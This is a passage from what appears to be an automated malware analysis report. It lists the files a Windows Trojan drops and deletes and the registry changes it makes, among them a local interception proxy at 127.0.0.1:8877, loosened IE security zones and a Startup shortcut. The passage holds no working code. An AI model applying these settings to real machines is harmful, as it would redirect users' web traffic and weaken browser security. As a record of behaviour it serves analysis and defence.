%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns88.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns35.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns7A.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns6A.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns3E.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns4C.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns4A.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns58.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns76.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns38.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns2D.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns33.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns60.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns3A.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns52.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\nsB1.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns75.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\nsA0.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns26.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\nsA9.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns43.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns9B.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns99.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns5F.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\nsB0.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns2A.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\nsAB.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns1B.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns25.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns31.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns20.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns5C.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns1A.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\nsAD.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\nsB5.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns8C.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns66.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns9C.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns36.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns41.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns32.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns96.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns93.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns49.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns28.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns6E.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\nsA6.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns2E.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns1C.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns84.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns3B.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns86.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns11.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns50.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns16.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns68.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns9E.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns97.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns81.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns59.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns53.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns45.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsrF.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns48.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns2F.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns15.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns85.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns42.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns3F.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns3D.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns98.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns70.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns1E.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns39.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns73.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\nsAE.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns30.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\nsB4.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns18.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns27.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns9D.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns79.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns9A.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns6D.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns37.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns69.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns71.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns94.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\nsA7.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns7C.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns8B.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns63.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns44.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns7D.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns8A.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns1F.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns8D.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns3C.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns23.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns87.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns47.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns4E.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns7B.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns12.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns14.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\nsB2.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns24.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns90.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns62.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns92.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns72.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns56.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns77.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns65.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns17.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns55.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns80.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns4D.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns89.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns4F.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns9F.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\nsA4.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns6C.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns19.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns57.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns5E.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns61.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns64.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns1D.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns22.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns5B.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns4B.tmp (0 bytes)

The process vchk.exe:456 makes changes in the file system.
The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsrC.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsrB.tmp (0 bytes)

The process internetport3.exe:1088 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\ML3M60RP\desktop.ini (67 bytes)
C:\a\loogg2.txt (240 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\HQR7BMVW\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\IYXZ7PKS\desktop.ini (67 bytes)
C:\a\logff.txt (718 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\8MWF95DD\desktop.ini (67 bytes)

The process %original file name%.exe:348 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\a\FiddlerCore.dll (9485 bytes)
C:\a\zuur.txt (2 bytes)
C:\a\internetport3.exe (10 bytes)
C:\a\wcheckf.exe (397 bytes)
C:\a\zhho.txt (3 bytes)
C:\a\zvchk.txt (3 bytes)
C:\a\EG9650tGGrxO3Eyr78zW.exe (3808 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi2.tmp\AccessControl.dll (13 bytes)
%Program Files%\FastInternet\app.exe (1078 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\HQR7BMVW\bdcount[1].htm (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\ML3M60RP\uniqueEG9650tGGrxO3Eyr78zW[1].htm (10 bytes)
C:\a\winonit.exe (435 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\8MWF95DD\EG9650tGGrxO3Eyr78zW[1].exe (3808 bytes)
C:\a\ayyyyy.txt (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi2.tmp\UAC.dll (13 bytes)
C:\a\ukey.ini (27 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi2.tmp\pwgen.dll (17 bytes)
C:\a\uniqueEG9650tGGrxO3Eyr78zW.ini (10 bytes)
C:\a\zvv.txt (21 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\IYXZ7PKS\cki[1].htm (11 bytes)
C:\a\ver.ini (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi2.tmp\SimpleFC.dll (5289 bytes)
C:\a\getcap.exe (10027 bytes)
C:\a\5ddzT3JjRl.exe (5873 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi2.tmp\inetc.dll (20 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\Startup\intr.lnk (527 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi2.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi2.tmp (4 bytes)
%Program Files%\FastInternet\dotuninstall.exe (1084 bytes)
C:\a\wincheckfe.exe (778 bytes)
C:\a\72870850.bat (287 bytes)
%System%\73581819.bat (19 bytes)
C:\a\install.txt (1 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsi2.tmp\pwgen.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi2.tmp\UAC.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst1.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi2.tmp\System.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi2.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi2.tmp\SimpleFC.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi2.tmp\AccessControl.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd3.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi2.tmp\inetc.dll (0 bytes)

Registry activity

The process winonit.exe:892 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 20 00 00 00 03 00 00 00 28 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "1"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride" = "<-loopback>"

"ProxyServer" = "http=127.0.0.1:8877;https=127.0.0.1:8877"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "91 78 C0 D7 BA FC ED 29 95 A7 6F 3B 26 A6 D5 9D"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

"IntranetName" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"

The process EG9650tGGrxO3Ey:1932 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKCU\Software\Policies\Microsoft\Internet Explorer\Main]
"Isolation" = "Po"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer" = "http=127.0.0.1:8877;https=127.0.0.1:8877"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 22 00 00 00 03 00 00 00 28 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "1"

[HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer\Control Panel]
"proxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "1"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "1"

[HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel]
"proxy" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride" = "<-loopback>"

[HKLM\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxySettingsPerUser" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer" = "http=127.0.0.1:8877;https=127.0.0.1:8877"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "02 81 CC 69 43 B2 FD B1 98 C5 CD 37 86 53 60 D6"

[HKCU\Software\Microsoft\Internet Explorer\Main]
"Isolation" = "Po"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Policies\Microsoft\Internet Explorer\Main]
"Isolation64Bit" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride" = "<-loopback>"

[HKCU\Software\Microsoft\Internet Explorer\Main]
"Isolation64Bit" = "0"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

"IntranetName" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"

The Trojan disables automatic startup of the application by deleting the following autorun value:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Adobe ARM"

"VMware User Process"

"SunJavaUpdateSched"

The process getcap.exe:1236 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "1F A9 84 23 6B 03 17 EC 1F 8E 49 6A 3F 1B DC 42"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

The process WMIC.exe:3044 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "01 D4 A4 E9 E9 EC 4F CB 7A 28 48 65 03 62 92 55"

The process wincheckfe.exe:1676 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "CB 4C 97 BD F1 4C CF 7D 20 F4 16 C7 29 EC A2 45"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

The process wcheckf.exe:660 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKCU\Software\Policies\Microsoft\Internet Explorer\Main]
"Isolation" = "Pn"

